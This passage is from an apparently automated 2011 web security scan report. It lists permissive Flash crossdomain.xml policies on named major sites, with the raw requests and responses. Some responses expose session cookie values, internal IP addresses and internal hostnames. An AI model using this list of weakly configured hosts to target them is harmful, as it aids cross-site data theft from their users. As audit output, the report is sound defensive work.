Severity:	High
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sportingnews.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:44 GMT
Server: Omniture DC/2.0.0
xserver: www411
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.62. http://sportsillustrated.cnn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sportsillustrated.cnn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sportsillustrated.cnn.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:35 GMT
Server: Apache
Last-Modified: Mon, 25 Oct 2010 17:53:44 GMT
Accept-Ranges: bytes
Content-Length: 759
Content-Type: application/xml
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*.si.com" />
   <allow-access-from domain="*.si-apps.com" />
   <allow-access-from domain="*.cnn.com" />
   <allow-access-from domain="*.cnn.net" />
   <allow-access-from domain="*.doubleclick.net" />
   <allow-access-from domain="*.turner.com" />
   <allow-access-from domain="*.secondthought.com" />
   <allow-access-from domain="*.2mdn.net" />
   <allow-access-from domain="*.wsj.com" />
   <allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.doubleclick.net" secure="true"/>
   <allow-access-from domain="*.fwmrm.net"/>
   <allow-access-from domain="*" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...

6.63. http://t.mookie1.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://t.mookie1.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:16 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 21:52:25 GMT
ETag: "5d240b9-c9-4a0bfb522d840"
Accept-Ranges: bytes
Content-Length: 201
Keep-Alive: timeout=15, max=3
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.64. http://tcr.tynt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tcr.tynt.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Thu, 05 May 2011 00:57:28 GMT
ETag: "251523935"
Expires: Thu, 05 May 2011 01:27:28 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: EOS (lax001/54D7)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.65. http://www.aolcdn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aolcdn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aolcdn.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 13 Feb 2009 16:24:41 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/xml
Date: Thu, 05 May 2011 00:58:56 GMT
Content-Length: 421
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSche
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.66. http://www.everydayhealth.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.everydayhealth.com

Response

HTTP/1.1 200 OK
Content-Length: 369
Content-Type: text/xml
Last-Modified: Fri, 22 Apr 2011 15:55:46 GMT
Accept-Ranges: bytes
ETag: "02df0bd51cc1:3644"
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 10:56:31 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permi
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.67. http://www.huffingtonpost.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "13598ce-fd-48a53d22e2200"
Content-Type: application/xml
Date: Thu, 05 May 2011 00:58:42 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...

6.68. http://www.mapquest.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mapquest.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapquest.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="nZG12c16OqjJIk32ss/xe+wwpew="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:04 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:04 GMT; Path=/
Set-Cookie: psession="ul5Rtcgv+4mAPbUgz5v+xO8fVFE="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:04 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:04 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"209-1304454924000"
Last-Modified: Tue, 03 May 2011 20:35:24 GMT
Content-Type: application/xml
Content-Length: 209
Date: Thu, 05 May 2011 00:57:04 GMT
Connection: keep-alive

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false"/></cross-domain
...[SNIP]...

6.69. http://xml.truveo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xml.truveo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: xml.truveo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:31 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 20:08:41 GMT
ETag: "1294019-104-4a264b4d30440"
Accept-Ranges: bytes
Content-Length: 260
Keep-Alive: timeout=15, max=65
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control perm
...[SNIP]...

6.70. http://abcnews.go.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://abcnews.go.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: abcnews.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60000
Connection: close
Date: Thu, 05 May 2011 10:52:10 GMT
Content-Type: text/xml
Last-Modified: Fri, 16 Oct 2009 20:19:08 GMT
Accept-Ranges: bytes
ETag: "0463aea9d4eca1:19df0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Set-Cookie: SWID=B58ECB92-659D-4546-8224-C624993FAF71; path=/; expires=Thu, 05-May-2031 10:52:10 GMT; domain=.go.com;
Cache-Expires: Thu, 05 May 2011 10:52:53 GMT
Content-Length: 1333
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abcnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="a.abcnews.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.abcnews.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.abc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.tequila.com" />
<allow-access-from domain="*.theplatform.com" secure="true" />
...[SNIP]...
<allow-access-from domain="localhost:7002" secure="false" />
...[SNIP]...
<allow-access-from domain="10.192.34.*" secure="false" />
...[SNIP]...
<allow-access-from domain="qlvabcweb01.corp.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="d.yimg.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="clearspring.com" />
<allow-access-from domain="widgets.clearspring.com" />
<allow-access-from domain="*.clearspring.com" />
...[SNIP]...

6.71. http://about.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://about.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: about.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:42:11 GMT
Server: AOLserver/4.0.10
MIME-Version: 1.0
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 1511
set-cookie: dcisid=3360738748.923646797.1404767232; path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="iamalpha.com" />
<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="static.stats.com" />
<allow-access-from domain="*.moviefone.com" />
<allow-access-from domain="*.aolhealth.com" />
<allow-access-from domain="*.walletpop.com" />
<allow-access-from domain="*.stats.com" />
<allow-access-from domain="*.lightningcast.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="*.fanhouse.com" />
<allow-access-from domain="*platformaprojects.com" />
...[SNIP]...

6.72. http://ad.wsod.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 05 May 2011 00:58:51 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "906968-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

6.73. http://add.my.yahoo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://add.my.yahoo.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: add.my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:13 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

6.74. http://ads.tw.adsonar.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads.tw.adsonar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.tw.adsonar.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:46 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300, max=428
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

6.75. https://adwords.google.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 05 May 2011 01:34:27 GMT
Expires: Fri, 06 May 2011 01:34:27 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 33470
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.76. http://aol.sportingnews.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://aol.sportingnews.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: aol.sportingnews.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/xml
Content-Length: 540
Last-Modified: Tue, 21 Sep 2010 17:41:28 GMT
Accept-Ranges: bytes
Date: Thu, 05 May 2011 00:57:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sportingnews.com" />
<allow-access-from domain="*.snimg.com" />
<allow-access-from domain="*.sn.internal" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.avatarlabs.com" />
<allow-access-from domain="*.doubleclick.com" />
<allow-access-from domain="*.dartmotif.com" />
...[SNIP]...

6.77. http://aol.worldwinner.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://aol.worldwinner.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: aol.worldwinner.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:19 GMT
Server: Apache
Last-Modified: Mon, 20 Oct 2003 15:12:42 GMT
Accept-Ranges: bytes
Content-Length: 388
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR NID TAIi OUR NOR CNT", CP="NOI DSP COR NID TAIi OUR NOR CNT"
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<!--
allows flash player 7 to post within worldwinner [flash solitaire:
...[SNIP]...
<allow-access-from domain='*.worldwinner.com' />
...[SNIP]...

6.78. http://api.local.yahoo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.local.yahoo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.local.yahoo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:31 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 09 Feb 2010 08:33:00 GMT
Accept-Ranges: bytes
Content-Length: 272
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
...[SNIP]...

6.79. http://ar-ar.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ar-ar.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ar-ar.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.52.222.33
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.80. http://ax.itunes.apple.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ax.itunes.apple.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ax.itunes.apple.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 13 Apr 2011 15:19:07 GMT
ETag: "1b0-4a0ce546d50c0"
Accept-Ranges: bytes
Content-Length: 432
Content-Type: text/xml
Cache-Control: public, no-transform, max-age=2135
Date: Thu, 05 May 2011 10:52:36 GMT
Connection: close
X-Apple-Partner: origin.0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*.apple.com" />
<allow-access-from domain="*.apple.com.edgesuite.net" />
<allow-access-from domain="nikeplus.nike.com"/>
<allow-access-from domain="nikerunning.nike.com"/>
...[SNIP]...

6.81. http://developers.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: developers.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.36.223.209
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.82. http://disqus.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://disqus.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:17 GMT
Server: Apache
